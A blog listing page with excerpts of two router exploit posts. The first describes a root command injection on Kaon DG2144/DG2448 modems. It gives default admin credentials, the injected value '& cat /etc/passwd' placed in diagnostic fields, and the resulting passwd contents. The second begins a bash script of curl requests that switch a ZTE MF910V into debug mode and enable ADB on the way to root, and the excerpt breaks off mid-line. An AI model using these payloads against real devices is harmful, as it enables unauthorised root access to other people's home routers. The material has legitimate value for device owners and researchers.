Posts

Showing posts from 2024

Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH )

Kaon DG2144 : Root Command Injection Exploit ( How To Enable SSH ) Kaon Dg2448 & Kaon DG2144  Upon analyzing the modems Web service, it is evident that the functions accessible through the URLs:  http://192.168.1.1/#/home/administration and http://192.168.1.1/#/home/status  are vulnerable to command execution as root. The specific functions susceptible to this vulnerability are Ping, Traceroute, NsLookup under Diagnostics, and Target under Connectivity Check as well as Numerous others.    To exploit this vulnerability, a user must be logged in with the credentials: Username: admin Password: admin@DG2144    By navigating to the Connectivity Check section on the main page and injecting the command '& cat /etc/passwd',  sensitive information such as user details can be retrieved.   The obtained data includes the root user's information:  root:x:0:0:root:/root:/bin/ash  daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false ... admin:x:0:0::/home/adm

Telstra ZteMF910/v Exploit Scripts

 Telstra ZteMF910/v Exploit Scripts To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required. Mode Switching and Enabling ADB To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example: language-bash #!/bin/bash # Mode Switching MODE_SWITCH_URL= "http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X" MODE_SWITCH_VALUE= "1" # Change X to 0 or 1 curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable= $MODE_SWITCH_VALUE " $MODE_SWITCH_URL # Enabling ADB ADB_ENABLE_URL= "http://192.168.0.1/goform/goform_set_cmd_pr